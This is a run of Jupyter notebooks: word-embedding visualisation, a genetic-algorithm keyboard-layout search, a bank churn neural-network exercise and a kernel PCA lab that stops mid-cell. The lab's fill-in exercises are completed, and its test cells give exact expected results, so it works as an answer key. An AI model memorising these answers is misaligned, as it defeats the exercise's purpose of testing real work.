_, closest_idxs = valid_similarities.topk(6)
valid_examples, closest_idxs = valid_examples.to('cpu'), closest_idxs.to('cpu')
for ii, valid_idx in enumerate(valid_examples):
closest_words = [int_to_vocab[idx.item()] for idx in closest_idxs[ii]][1:]
print(int_to_vocab[valid_idx.item()] + " | " + ', '.join(closest_words))
print("...\n")
```
## Visualizing the word vectors
Below we'll use T-SNE to visualize how our high-dimensional word vectors cluster together. T-SNE is used to project these vectors into two dimensions while preserving local structure. Check out [this post from Christopher Olah](http://colah.github.io/posts/2014-10-Visualizing-MNIST/) to learn more about T-SNE and other ways to visualize high-dimensional data.
```
%matplotlib inline
%config InlineBackend.figure_format = 'retina'
import matplotlib.pyplot as plt
from sklearn.manifold import TSNE
# getting embeddings from the embedding layer of our model, by name
embeddings = model.in_embed.weight.to('cpu').data.numpy()
viz_words = 380
tsne = TSNE()
embed_tsne = tsne.fit_transform(embeddings[:viz_words, :])
fig, ax = plt.subplots(figsize=(16, 16))
for idx in range(viz_words):
plt.scatter(*embed_tsne[idx, :], color='steelblue')
plt.annotate(int_to_vocab[idx], (embed_tsne[idx, 0], embed_tsne[idx, 1]), alpha=0.7)
#
```
```
import os
from os.path import join, pardir
from collections import Counter
from copy import deepcopy
import numpy as np
from deap import base, creator, algorithms, tools
from dssg_challenge import compute_cost, check_keyboard
RNG_SEED = 0
DATA_DSSG = join(pardir, 'data', 'processed')
rng = np.random.RandomState(RNG_SEED)
os.listdir(DATA_DSSG)
# get keys
with open(join(DATA_DSSG, 'en-keys.txt'), 'r') as file:
keys = file.read()
# get corpus example
with open(join(DATA_DSSG, 'en-corpus.txt'), 'r') as file:
corpus = file.read()
keys = ''.join(keys.split('\n'))
corpus = ''.join(corpus.split(keys)).split('\n')[0]
```
Some keys are used to signal special characters. Namely,
- The ENTER key is represented as 0.
- The shift key for capitalization is represented as ^.
- The backspace key is represented as <.
- All the remaining characters not found in the valid keys are encoded as #.
- Empty keys will contain the character _.
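A minimal sketch of these encoding rules as a helper function (hypothetical; the actual encoding was already applied when the corpus files were generated, and the shift key `^` for capitalization is handled separately and omitted here):

```python
# Hypothetical helper illustrating the encoding rules above.
def encode_char(ch, valid_keys):
    if ch == '\n':
        return '0'   # ENTER key
    if ch.upper() in valid_keys:
        return ch.upper()
    return '#'       # any character not among the valid keys

print(encode_char('b', 'ABC0#'))  # B
```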
```
len(keys), keys
```
## The most basic approaches
```
Counter(corpus).most_common()[:10]
baseline = ''.join([i[0] for i in Counter(corpus).most_common()])
baseline = baseline + ''.join([i for i in keys if i not in baseline]) + ' T'
baseline
shuffled = list(baseline)
rng.shuffle(shuffled)
anthony = 'EINOA TCGVDURL<^SWH_Z__XJQFPBMY,#.0K?'
check_keyboard(baseline, keys)
check_keyboard(keys+' T', keys)
check_keyboard(shuffled, keys)
check_keyboard(''.join([i if i!='_' else ' ' for i in anthony]), keys)
print('Shuffled cost:\t\t\t', compute_cost(''.join(shuffled), corpus))
print('Original keys cost:\t\t', compute_cost(keys+' ', corpus))
print('Baseline cost:\t\t\t', compute_cost(baseline, corpus))
print('Anthony Carbajal\'s solution:\t', compute_cost(''.join([i for i in anthony if i!='_']), corpus))
```
## First attempt with GA
```
keys_list = list(keys)
def evaluate(individual):
"""
Computes the cost for each individual.
"""
try:
check_keyboard(individual, keys)
return [compute_cost(''.join(list(individual)), corpus)]
except AssertionError:
return [np.inf]
def mutFlip(ind1, ind2):
    """Flip mutation: each key of the first individual is replaced by a
    random valid key with probability 0.05. If the mutated keyboard is
    invalid, the mutation is retried. A copy is required because slicing
    in numpy returns a view of the data.
    """
    ind = ind1.copy()
    for x, value in np.ndenumerate(ind):
        if np.random.random() < .05:
            ind[x] = np.random.choice(keys_list)
    try:
        check_keyboard(ind, keys)
        return ind, ind2
    except AssertionError:
        return mutFlip(ind1, ind2)
creator.create('FitnessMin', base.Fitness, weights=(-1.0,))
creator.create('Individual', np.ndarray, fitness=creator.FitnessMin)
toolbox = base.Toolbox()
# Tool to randomly initialize an individual
toolbox.register('attribute',
np.random.permutation, np.array(list(baseline))
)
toolbox.register('individual',
tools.initIterate,
creator.Individual,
toolbox.attribute
)
toolbox.register('population',
tools.initRepeat,
list,
toolbox.individual
)
toolbox.register("evaluate", evaluate)
toolbox.register("mate", tools.cxOnePoint)
toolbox.register("mutate", tools.mutShuffleIndexes, indpb=0.05)
toolbox.register("select", tools.selTournament, tournsize=3)
def main():
np.random.seed(64)
pop = toolbox.population(n=20)
    # The numpy equality function (operator.eq) between two arrays returns the
    # element-wise equality, which raises an exception in the similar() check
    # of the hall of fame. Using a different equality function such as
    # numpy.array_equal or numpy.allclose solves this issue.
hof = tools.HallOfFame(1, similar=np.array_equal)
stats = tools.Statistics(lambda ind: ind.fitness.values)
stats.register("avg", np.mean)
stats.register("std", np.std)
stats.register("min", np.min)
stats.register("max", np.max)
algorithms.eaSimple(pop, toolbox, cxpb=0, mutpb=0.6, ngen=1000, stats=stats,
halloffame=hof)
return pop, stats, hof
pop, stats, hof = main()
''.join(list(hof)[0])
check_keyboard(''.join(list(hof)[0]), keys)
compute_cost(''.join(list(hof)[0]), corpus)
check_keyboard(' RDSTOECP#<WINALGYKX , ^0.ZMFHUJVBT?Q', keys)
compute_cost(' RDSTOECP#<WINALGYKX , ^0.ZMFHUJVBT?Q', corpus)
```
## Hall of fame solutions
' ONYTIAIMZGBCHEDRSL,P#.^0TQX VK?W<JFU' - 1673.418
' REASTO<DGWVPMILNYHTJC ^0. #?X,QUBZFK' - 1637.709
' RDSTOECP#<WINALGYKX , ^0.ZMFHUJVBT?Q' - 1582.775
'T OISLADERNMGW #UYHTVKCFPX<, ?ZJ.0^BQ' - 1597.119
'OSNA ETM GWYPRLV HI#.0^<J?BKC,FTUDQZX' - 1599.910
|
github_jupyter
|
# Problem Statement
Customer churn and engagement have become top issues for most banks: it costs significantly more to acquire new customers than to retain existing ones, so retaining customers is of the utmost importance to a bank.
We have data from MeBank (name changed) covering 7,124 customers. The data-set contains a dependent variable "Exited" and various independent variables.
Based on the data, build a model to predict whether a customer will exit the bank. Split the data into train and test sets (70:30), build the model on the train set and test it on the test set. Then provide recommendations to the bank so that it can retain customers who are on the verge of exiting.
# Data Dictionary
<b>CustomerID</b> - Bank ID of the Customer
<b>Surname</b> - Customer’s Surname
<b>CreditScore</b> - Current Credit score of the customer
<b>Geography</b> - Current country of the customer
<b>Gender</b> - Customer’s Gender
<b>Age</b> - Customer’s Age
<b>Tenure</b> - Customer’s duration association with bank in years
<b>Balance</b> - Current balance in the bank account.
<b>Num of Dependents</b> - Number of dependents
<b>Has Crcard</b> - 1 denotes customer has a credit card and 0 denotes customer does not have a credit card
<b>Is Active Member</b> - 1 denotes customer is an active member and 0 denotes customer is not an active member
<b>Estimated Salary</b> - Customer’s approx. salary
<b>Exited</b> - 1 denotes customer has exited the bank and 0 denotes otherwise
### Load library and import data
```
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.neural_network import MLPClassifier
churn=pd.read_csv("Churn_Modelling.csv")
```
### Inspect the data
```
churn.head()
churn.info()
```
The Age and Balance variables hold numeric data but their data type is object; it appears some special character is present in these columns.
There are also missing values in some variables.
# EDA
### Removing unwanted variables
```
# Drop the identifier columns (names taken from the data dictionary) and check the first 10 rows
churn = churn.drop(columns=['CustomerID', 'Surname'])
churn.head(10)
```
Checking dimensions after removing unwanted variables,
### Summary
```
churn.describe(include="all")
churn.shape
```
### Proportion of observations in Target classes
```
# Get the proportions of observations in each target class
churn['Exited'].value_counts(normalize=True)
```
### Checking for Missing values
```
# Are there any missing values?
churn.isnull().sum()
```
There are some missing values
### Checking for inconsistencies in Balance and Age variable
```
churn.Balance.sort_values()
```
There are 3 cases where '?' is present and 3 cases with missing values in the Balance variable.
The summary above also confirms the count of missing values.
To confirm the count of '?', run value_counts():
```
churn.Balance.value_counts()
churn[churn.Balance=="?"]
```
This confirms there are 3 cases having ?
```
churn.Age.value_counts().sort_values()
```
There is 1 case where ? is present
### Replacing ? as Nan in Age and Balance variable
```
# Replace '?' with NaN so the values can be treated as missing
churn['Age'] = churn['Age'].replace('?', np.nan)
churn['Balance'] = churn['Balance'].replace('?', np.nan)
```
Verifying count of missing values for Age and Balance variable below:
```
churn.Balance.isnull().sum()
churn.Age.isnull().sum()
```
### Imputing missing values
```
sns.boxplot(churn['Credit Score'])
```
As outliers are present in Credit Score, we impute its null values with the median.
```
sns.boxplot(churn['Tenure'])
sns.boxplot(churn['Estimated Salary'])
```
Substituting the median for Credit Score (robust to its outliers) and the mean for the other numeric variables:
```
churn['Credit Score'] = churn['Credit Score'].fillna(churn['Credit Score'].median())
for column in ['Tenure', 'Estimated Salary']:
    mean = churn[column].mean()
    churn[column] = churn[column].fillna(mean)
churn.isnull().sum()
```
### Converting Object data type into Categorical
```
for column in churn[['Geography','Gender','Has CrCard','Is Active Member']]:
if churn[column].dtype == 'object':
churn[column] = pd.Categorical(churn[column]).codes
churn.head()
churn.info()
```
### Substituting the mode value for all categorical variables
```
for column in churn[['Geography','Gender','Has CrCard','Is Active Member']]:
mode = churn[column].mode()
churn[column] = churn[column].fillna(mode[0])
churn.isnull().sum()
```
Age and Balance are still not addressed. Getting the modal value
```
churn['Balance'].mode()
churn['Age'].mode()
```
Replacing nan with modal values,
```
churn['Balance']=churn['Balance'].fillna(3000)
churn['Age']=churn['Age'].fillna(37)
churn.isnull().sum()
```
There are no more missing values.
```
churn.info()
```
Age and Balance are still of object type and must be converted to numeric.
### Converting Age and Balance to numeric variables
```
churn['Age']=churn['Age'].astype(str).astype(int)
churn['Balance']=churn['Balance'].astype(str).astype(float)
```
### Checking for Duplicates
```
# Are there any duplicates ?
dups = churn.duplicated()
print('Number of duplicate rows = %d' % (dups.sum()))
churn[dups]
```
There are no Duplicates
### Checking for Outliers
```
plt.figure(figsize=(15,15))
churn[['Age','Balance','Credit Score', 'Tenure', 'Estimated Salary']].boxplot(vert=0)
```
A very small number of outliers is present, which is not significant as it will not affect the ANN predictions much.
### Checking pairwise distribution of the continuous variables
```
import seaborn as sns
sns.pairplot(churn[['Age','Balance','Credit Score', 'Tenure', 'Estimated Salary']])
```
### Checking for Correlations
```
# construct heatmap with only continuous variables
plt.figure(figsize=(10,8))
sns.set(font_scale=1.2)
sns.heatmap(churn[['Age','Balance','Credit Score', 'Tenure', 'Estimated Salary']].corr(), annot=True)
```
There is hardly any correlation between the variables
### Train Test Split
```
from sklearn.model_selection import train_test_split
# Extract x (predictors) and y (target)
x = churn.drop('Exited', axis=1)
y = churn['Exited']
# Split data into 70% training and 30% test data (random_state fixed for reproducibility)
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.30, random_state=1)
# Checking dimensions on the train and test data
print('x_train: ',x_train.shape)
print('x_test: ',x_test.shape)
print('y_train: ',y_train.shape)
print('y_test: ',y_test.shape)
```
### Scaling the variables
```
from sklearn.preprocessing import StandardScaler
# Initialize an object for StandardScaler
sc = StandardScaler()
# Scale the training data
x_train = sc.fit_transform(x_train)
x_train
# Apply the transformation on the test data
x_test = sc.transform(x_test)
x_test
```
### Building Neural Network Model
```
clf = MLPClassifier(hidden_layer_sizes=100, max_iter=5000,
solver='sgd', verbose=True, random_state=21,tol=0.01)
# Fit the model on the training data
clf.fit(x_train, y_train)
```
### Predicting training data
```
# Use the model to predict the training data
y_pred = clf.predict(x_train)
```
### Evaluating model performance on training data
```
from sklearn.metrics import confusion_matrix,classification_report
confusion_matrix(y_train,y_pred)
print(classification_report(y_train, y_pred))
# AUC and ROC for the training data
# predict probabilities
probs = clf.predict_proba(x_train)
# keep probabilities for the positive outcome only
probs = probs[:, 1]
# calculate AUC
from sklearn.metrics import roc_auc_score
auc = roc_auc_score(y_train, probs)
print('AUC: %.3f' % auc)
# calculate roc curve
from sklearn.metrics import roc_curve
fpr, tpr, thresholds = roc_curve(y_train, probs)
plt.plot([0, 1], [0, 1], linestyle='--')
# plot the roc curve for the model
plt.plot(fpr, tpr, marker='.')
# show the plot
plt.show()
```
### Predicting Test Data and comparing model performance
```
y_pred = clf.predict(x_test)
confusion_matrix(y_test, y_pred)
print(classification_report(y_test, y_pred))
# AUC and ROC for the test data
# predict probabilities
probs = clf.predict_proba(x_test)
# keep probabilities for the positive outcome only
probs = probs[:, 1]
# calculate AUC
auc = roc_auc_score(y_test, probs)
print('AUC: %.3f' % auc)
# calculate roc curve
fpr, tpr, thresholds = roc_curve(y_test, probs)
plt.plot([0, 1], [0, 1], linestyle='--')
# plot the roc curve for the model
plt.plot(fpr, tpr, marker='.')
# show the plot
plt.show()
```
### Model Tuning through Grid Search
**The code below may take a long time to run. These values can be used instead: {'hidden_layer_sizes': 500, 'max_iter': 5000, 'solver': 'adam', 'tol': 0.01}**
```
from sklearn.model_selection import GridSearchCV
param_grid = {
'hidden_layer_sizes': [100,200,300,500],
'max_iter': [5000,2500,7000,6000],
'solver': ['sgd','adam'],
'tol': [0.01],
}
nncl = MLPClassifier(random_state=1)
grid_search = GridSearchCV(estimator = nncl, param_grid = param_grid, cv = 10)
grid_search.fit(x_train, y_train)
grid_search.best_params_
best_grid = grid_search.best_estimator_
best_grid
ytrain_predict = best_grid.predict(x_train)
ytest_predict = best_grid.predict(x_test)
confusion_matrix(y_train,ytrain_predict)
# Accuracy of Train data
print(classification_report(y_train,ytrain_predict))
#from sklearn.metrics import roc_curve,roc_auc_score
rf_fpr, rf_tpr,_=roc_curve(y_train,best_grid.predict_proba(x_train)[:,1])
plt.plot(rf_fpr,rf_tpr, marker='x', label='NN')
plt.plot(np.arange(0,1.1,0.1),np.arange(0,1.1,0.1))
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC')
plt.show()
print('Area under Curve is', roc_auc_score(y_train,best_grid.predict_proba(x_train)[:,1]))
confusion_matrix(y_test,ytest_predict)
# Accuracy of Test data
print(classification_report(y_test,ytest_predict))
#from sklearn.metrics import roc_curve,roc_auc_score
rf_fpr, rf_tpr,_=roc_curve(y_test,best_grid.predict_proba(x_test)[:,1])
plt.plot(rf_fpr,rf_tpr, marker='x', label='NN')
plt.plot(np.arange(0,1.1,0.1),np.arange(0,1.1,0.1))
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC')
plt.show()
print('Area under Curve is', roc_auc_score(y_test,best_grid.predict_proba(x_test)[:,1]))
best_grid.score
```
## Conclusion
AUC on the training data is 86% and on the test data 84%. The precision and recall metrics are also almost identical between the training and test sets, which indicates neither overfitting nor underfitting has occurred.
The best_grid model improves on the initial clf model, whose sensitivity was much lower.
The overall model performance is good enough to start predicting whether a new customer will churn.
|
github_jupyter
|
# **Lab Session : Feature extraction II**
Author: Vanessa Gómez Verdejo (http://vanessa.webs.tsc.uc3m.es/)
Updated: 27/02/2017 (working with sklearn 0.18.1)
In this lab session we are going to work with some of the kernelized extensions of most well-known feature extraction techniques: PCA, PLS and CCA.
As in the previous notebook, to analyze the discriminatory capability of the extracted features, let's use a linear SVM as classifier and use its final accuracy over the test data to evaluate the goodness of the different feature extraction methods.
To implement the different approaches we will rely on the [Scikit-Learn](http://scikit-learn.org/stable/) python toolbox.
#### ** During this lab we will cover: **
#### *Part 2: Non-linear feature extraction*
##### * Part 2.1: Kernel extensions of PCA*
##### * Part 2.2: Analyzing the influence of the kernel parameter*
##### * Part 2.3: Kernel MVA approaches*
As you progress in this notebook, you will have to complete some exercises. Each exercise includes an explanation of what is expected, followed by code cells where one or several lines contain `<FILL IN>`. The cell that needs to be modified will have `# TODO: Replace <FILL IN> with appropriate code` on its first line. Once the `<FILL IN>` sections are updated, the code can be run; below each such cell you will find a test cell (beginning with the line `# TEST CELL`) that you can run to verify the correctness of your solution.
```
%matplotlib inline
```
## *Part 2: Non-linear feature extraction*
#### ** 2.0: Creating toy problem **
The following code lets you generate a bidimensional problem consisting of three circles of data with different radii, each one associated with a different class.
As expected from the geometry of the problem, the classification boundary is not linear, so we will be able to analyze the advantages of using non-linear feature extraction techniques to transform the input space into a new space where a linear classifier can provide an accurate solution.
```
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import label_binarize
from sklearn.preprocessing import StandardScaler
from sklearn.datasets import make_circles
import matplotlib.pyplot as plt
np.random.seed(0)
X, Y = make_circles(n_samples=400, factor=.6, noise=.1)
X_c2 = 0.1*np.random.randn(200,2)
Y_c2 = 2*np.ones((200,))
X= np.vstack([X,X_c2])
Y= np.hstack([Y,Y_c2])
plt.figure()
plt.title("Original space")
reds = Y == 0
blues = Y == 1
green = Y == 2
plt.plot(X[reds, 0], X[reds, 1], "ro")
plt.plot(X[blues, 0], X[blues, 1], "bo")
plt.plot(X[green, 0], X[green, 1], "go")
plt.xlabel("$x_1$")
plt.ylabel("$x_2$")
plt.show()
# split into a training and testing set
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.25)
# Normalizing the data
scaler = StandardScaler()
X_train = scaler.fit_transform(X_train)
X_test = scaler.transform(X_test)
# Binarize the labels for supervised feature extraction methods
set_classes = np.unique(Y)
Y_train_bin = label_binarize(Y_train, classes=set_classes)
Y_test_bin = label_binarize(Y_test, classes=set_classes)
```
### ** Part 2.1: Kernel PCA**
To extend the previous PCA feature extraction approach to its non-linear version, we can make use of the [KernelPCA( )](http://scikit-learn.org/stable/modules/generated/sklearn.decomposition.KernelPCA.html#sklearn.decomposition.KernelPCA) function.
For this exercise, we are going to consider a Radial Basis Function (RBF) kernel, where each element of the kernel matrix is given by $k(x_i,x_j) = \exp (- \gamma (x_i -x_j)^2)$.
To analyze the advantages of the non linear feature extraction, let's compare it with its linear version. So, let's start computing both linear and kernelized versions of PCA. Complete the following code to obtain the variables (P_train, P_test) and (P_train_k, P_test_k) which have to contain, respectively, the projected data of the linear PCA and the KPCA.
To start to work, compute a maximum of two new projected features and fix gamma (the kernel parameter) to 1.
```
###########################################################
# TODO: Replace <FILL IN> with appropriate code
###########################################################
from sklearn.decomposition import PCA, KernelPCA
N_feat_max=2
# linear PCA
pca = PCA(n_components=N_feat_max)
pca.fit(X_train, Y_train)
P_train = pca.transform(X_train)
P_test = pca.transform(X_test)
# KPCA
pca_K = KernelPCA(n_components=N_feat_max, kernel="rbf", gamma=1)
pca_K.fit(X_train, Y_train)
P_train_k = pca_K.transform(X_train)
P_test_k =pca_K.transform(X_test)
print('PCA and KPCA projections successfully computed')
```
Now, let's evaluate the discriminatory capability of the projected data (both the linear and the kernelized ones) by feeding them to a linear SVM and measuring its accuracy over the test data. Complete the following code to return in the variables acc_test_lin and acc_test_kernel the SVM test accuracy using either the linear PCA projections or the KPCA ones.
```
###########################################################
# TODO: Replace <FILL IN> with appropriate code
###########################################################
# Define SVM classifier
from sklearn import svm
clf = svm.SVC(kernel='linear')
# Train it using linear PCA projections and evaluate it
clf.fit(P_train, Y_train)
acc_test_lin = clf.score(P_test, Y_test)
# Train it using KPCA projections and evaluate it
clf.fit(P_train_k, Y_train)
acc_test_kernel = clf.score(P_test_k, Y_test)
print("The test accuracy using linear PCA projections is %2.2f%%" %(100*acc_test_lin))
print("The test accuracy using KPCA projections is %2.2f%%" %(100*acc_test_kernel))
###########################################################
# TEST CELL
###########################################################
from test_helper import Test
# TEST Training and test data generation
Test.assertEquals(np.round(acc_test_lin,4), 0.2400, 'incorrect result: test accuracy using linear PCA projections is incorrect')
Test.assertEquals(np.round(acc_test_kernel,4), 0.9533, 'incorrect result: test accuracy using KPCA projections is incorrect')
```
Finally, let's analyze the transformation capabilities of KPCA vs. linear PCA by plotting the resulting projected data for both the training and test data sets.
Just run the following cells to obtain the desired representation.
```
def plot_projected_data(data, label):
"""Plot the desired sample data assigning differenet colors according to their categories.
Only two first dimensions of data ar plot and only three different categories are considered.
Args:
data: data set to be plot (number data x dimensions).
labes: target vector indicating the category of each data.
"""
reds = label == 0
blues = label == 1
green = label == 2
plt.plot(data[reds, 0], data[reds, 1], "ro")
plt.plot(data[blues, 0], data[blues, 1], "bo")
plt.plot(data[green, 0], data[green, 1], "go")
plt.xlabel("$x_1$")
plt.ylabel("$x_2$")
plt.figure(figsize=(8, 8))
plt.subplot(2,2,1)
plt.title("Projected space of linear PCA for training data")
plot_projected_data(P_train, Y_train)
plt.subplot(2,2,2)
plt.title("Projected space of KPCA for training data")
plot_projected_data(P_train_k, Y_train)
plt.subplot(2,2,3)
plt.title("Projected space of linear PCA for test data")
plot_projected_data(P_test, Y_test)
plt.subplot(2,2,4)
plt.title("Projected space of KPCA for test data")
plot_projected_data(P_test_k, Y_test)
plt.show()
```
Go to the first cell and modify the kernel parameter (for instance, set gamma to 10 or 100) and run the code again. What is happening? Why?
### ** Part 2.2: Analyzing the influence of the kernel parameter**
In the case of working with RBF kernel, the kernel width selection can be critical:
* If the gamma value is too high, the width of the RBF shrinks (tending towards a delta function) and the interaction between training data points becomes null. Each data point is projected onto itself and assigned a dual variable, in such a way that the best possible projection (for classification purposes) of the training data is obtained, causing overfitting problems.
* If the gamma value is close to zero, the RBF width increases and the kernel behavior tends to be similar to a linear kernel; in this case, the non-linear properties are lost.
Therefore, in this kind of application the value of the kernel width can be critical, and it is advisable to select it by cross-validation.
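Both limiting behaviours are easy to check numerically. The quick sketch below (with made-up data, not part of the lab exercises) shows that for a very large gamma the RBF kernel matrix collapses towards the identity, while for a gamma near zero all entries approach 1:

```python
import numpy as np
from sklearn.metrics.pairwise import rbf_kernel

rng = np.random.RandomState(0)
X = rng.randn(5, 2)

# Very large gamma: off-diagonal entries vanish and K tends to the identity,
# i.e., every sample only "sees" itself (overfitting regime)
K_hi = rbf_kernel(X, X, gamma=1e3)
print(np.allclose(K_hi, np.eye(5), atol=1e-3))   # True (for distinct points)

# Very small gamma: all entries tend to 1 and the kernel loses its
# discriminative structure (quasi-linear regime)
K_lo = rbf_kernel(X, X, gamma=1e-6)
print(np.allclose(K_lo, np.ones((5, 5)), atol=1e-3))  # True
```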
This part of the lab aims to adjust the gamma parameter through a validation process, so we will start by creating a validation partition of the training data.
```
## Redefine the data partitions: creating a validation partition
# split training data into a training and validation set
X_train2, X_val, Y_train2, Y_val = train_test_split(X_train, Y_train, test_size=0.33)
# Normalizing the data
scaler = StandardScaler()
X_train2 = scaler.fit_transform(X_train2)
X_val = scaler.transform(X_val)
X_test = scaler.transform(X_test)
# Binarize the training labels for supervised feature extraction methods
set_classes = np.unique(Y)
Y_train_bin2 = label_binarize(Y_train2, classes=set_classes)
```
Now let's evaluate the KPCA performance when different values of gamma are used. Complete the code below so that, for each gamma value, you:
* Train the KPCA and obtain the projections for the training, validation and test data.
* Obtain the accuracies of a linear SVM over the validation and test partitions.
Once you have the validation and test accuracies for each gamma value, obtain the optimum gamma value (i.e., the gamma value which provides the maximum validation accuracy) and its corresponding test accuracy.
```
###########################################################
# TODO: Replace <FILL IN> with appropriate code
###########################################################
from sklearn.decomposition import KernelPCA
from sklearn import svm
np.random.seed(0)
# Defining parameters
N_feat_max = 2
rang_g = [0.01, 0.05, 0.1, 0.5, 1, 5, 10, 50 , 100, 500, 1000]
# Variables to save validation and test accuracies
acc_val = []
acc_test = []
# Loop to explore gamma values
for g_value in rang_g:
    print('Evaluating with gamma ' + str(g_value))
# 1. Train KPCA and project the data
pca_K = KernelPCA(n_components=N_feat_max, kernel="rbf", gamma=g_value)
pca_K.fit(X_train2, Y_train2)
P_train_k = pca_K.transform(X_train2)
P_val_k = pca_K.transform(X_val)
P_test_k = pca_K.transform(X_test)
# 2. Evaluate the projection performance
clf = svm.SVC(kernel='linear')
clf.fit(P_train_k, Y_train2)
acc_val.append(clf.score(P_val_k, Y_val))
acc_test.append(clf.score(P_test_k, Y_test))
# Find the optimum value of gamma (maximum validation accuracy) and its corresponding test accuracy
pos_max = np.argmax(acc_val)
g_opt = rang_g[pos_max]
acc_test_opt = acc_test[pos_max]
print('Optimum value of gamma: ' + str(g_opt))
print('Test accuracy: ' + str(acc_test_opt))
###########################################################
# TEST CELL
###########################################################
from test_helper import Test
# TEST Training and test data generation
Test.assertEquals(g_opt, 1, 'incorrect result: validated gamma value is incorrect')
Test.assertEquals(np.round(acc_test_opt,4), 0.9467, 'incorrect result: validated test accuracy is incorrect')
```
Finally, just run the next code to train the final model with the selected gamma value and plot the projected data
```
# Train KPCA and project the data
pca_K = KernelPCA(n_components=N_feat_max, kernel="rbf", gamma=g_opt)
pca_K.fit(X_train2)
P_train_k = pca_K.transform(X_train2)
P_val_k = pca_K.transform(X_val)
P_test_k = pca_K.transform(X_test)
# Plot the projected data
plt.figure(figsize=(15, 5))
plt.subplot(1,3,1)
plt.title("Projected space of KPCA: train data")
plot_projected_data(P_train_k, Y_train2)
plt.subplot(1,3,2)
plt.title("Projected space of KPCA: validation data")
plot_projected_data(P_val_k, Y_val)
plt.subplot(1,3,3)
plt.title("Projected space of KPCA: test data")
plot_projected_data(P_test_k, Y_test)
plt.show()
```
### ** Part 2.3: Kernel MVA approaches**
Until now, we have only used the KPCA approach, because it is the only non-linear feature extraction method included in Scikit-Learn.
However, if we compare the linear and kernel versions of MVA approaches, we can extend any linear MVA method to its kernelized version: we call the same methods reviewed for the linear approaches with the training kernel matrix instead of the training data, and the method learns the dual variables instead of the eigenvectors.
The following table relates both approaches:
| | Linear | Kernel |
|------ |---------------------------|----------------------------|
|Input data | ${\bf X}$ | ${\bf K}$ |
|Variables to compute (fit) |Eigenvectors (${\bf U}$) |Dual variables (${\bf A}$) |
|Projection vectors | ${\bf U}$ |${\bf U}=\Phi^T {\bf A}$ (cannot be computed) |
|Project data (transform) |${\bf X}' = {\bf U}^T {\bf X}^T$|${\bf X}' ={\bf A}^T \Phi \Phi^T = {\bf A}^T {\bf K}$|
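The correspondence in this table can be verified on a toy example: running linear PCA on the double-centered training kernel matrix recovers, component by component, the same projection directions as KPCA (up to sign and a per-component scale). This is a quick sketch with synthetic data, not part of the graded exercises:

```python
import numpy as np
from sklearn.decomposition import PCA, KernelPCA
from sklearn.metrics.pairwise import rbf_kernel

rng = np.random.RandomState(0)
X = rng.randn(50, 2)

# KPCA computed directly on the input data
P_kpca = KernelPCA(n_components=2, kernel="rbf", gamma=1.0).fit_transform(X)

# Same thing via the dual route: linear PCA on the double-centered kernel matrix
K = rbf_kernel(X, X, gamma=1.0)
K_c = K - K.mean(axis=0) - K.mean(axis=1)[:, None] + K.mean()
P_dual = PCA(n_components=2).fit_transform(K_c)

# Each component agrees up to sign and scale: |correlation| is ~1
for j in range(2):
    c = np.corrcoef(P_kpca[:, j], P_dual[:, j])[0, 1]
    print(round(abs(c), 3))
```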
** Computing and centering the kernel matrices **
Let's start this section computing the kernel matrices that we need to train and evaluate the different feature extraction methods. For this exercise, we are going to consider a Radial Basis Function (RBF) kernel, where each element of the kernel matrix is given by $k(x_i,x_j) = \exp (- \gamma (x_i -x_j)^2)$.
In particular, we need to compute two kernel matrices:
* The training kernel matrix (K_tr), where the RBF is computed pairwise over the training data. The resulting matrix has dimension $N_{tr} \times N_{tr}$, with $N_{tr}$ the number of training data.
* The test kernel matrix (K_test), where the RBF is computed between training and test samples, i.e., in the RBF expression the data $x_i$ belong to the test set whereas $x_j$ belong to the training set. The resulting matrix has dimension $N_{test} \times N_{tr}$, with $N_{test}$ and $N_{tr}$ the number of test and training data, respectively.
Use the [rbf_kernel( )](http://scikit-learn.org/stable/modules/generated/sklearn.metrics.pairwise.rbf_kernel.html) function to compute the K_tr and K_test kernel matrices. Fix the kernel width value (gamma) to 1.
```
###########################################################
# TODO: Replace <FILL IN> with appropriate code
###########################################################
# Computing the kernel matrix
from sklearn.metrics.pairwise import rbf_kernel
g_value = 1
# Compute the kernel matrix (use the X_train matrix, before dividing it in validation and training data)
K_tr = rbf_kernel(X_train, X_train, gamma=g_value)
K_test = rbf_kernel(X_test, X_train, gamma=g_value)
###########################################################
# TEST CELL
###########################################################
from test_helper import Test
# TEST Training and test data generation
Test.assertEquals(K_tr.shape, (450,450), 'incorrect result: dimensions of training kernel matrix are incorrect')
Test.assertEquals(K_test.shape, (150,450), 'incorrect result: dimensions of test kernel matrix are incorrect')
```
After computing these kernel matrices, they have to be centered (in the same way that we remove the mean when working in the input space). For this purpose, the next code provides the function center_K(). Use it to remove the mean of both the K_tr and K_test matrices.
```
def center_K(K):
"""Center a kernel matrix K, i.e., removes the data mean in the feature space.
Args:
K: kernel matrix
"""
size_1,size_2 = K.shape;
D1 = K.sum(axis=0)/size_1
D2 = K.sum(axis=1)/size_2
E = D2.sum(axis=0)/size_1
K_n = K + np.tile(E,[size_1,size_2]) - np.tile(D1,[size_1,1]) - np.tile(D2,[size_2,1]).T
return K_n
###########################################################
# TODO: Replace <FILL IN> with appropriate code
###########################################################
# Center the kernel matrix
K_tr_c = center_K(K_tr)
K_test_c = center_K(K_test)
###########################################################
# TEST CELL
###########################################################
from test_helper import Test
# TEST Training and test data generation
Test.assertEquals(np.round(K_tr_c[0][0],2), 0.55, 'incorrect result: centered training kernel matrix is incorrect')
Test.assertEquals(np.round(K_test_c[0][0],2), -0.24, 'incorrect result: centered test kernel matrix is incorrect')
```
** Alternative KPCA formulation **
Complete the following code lines to obtain a KPCA implementation using the linear PCA function with the kernel matrix as input data. Then, compare its result with that of the KPCA function.
```
###########################################################
# TODO: Replace <FILL IN> with appropriate code
###########################################################
from sklearn.decomposition import PCA
from sklearn.decomposition import KernelPCA
from sklearn import svm
# Defining parameters
N_feat_max = 2
## PCA method (to complete)
# 1. Train PCA with the kernel matrix and project the data
pca_K2 = PCA(n_components=N_feat_max)
pca_K2.fit(K_tr_c, Y_train)
P_train_k2 = pca_K2.transform(K_tr_c)
P_test_k2 = pca_K2.transform(K_test_c)
# 2. Evaluate the projection performance
clf = svm.SVC(kernel='linear')
clf.fit(P_train_k2, Y_train)
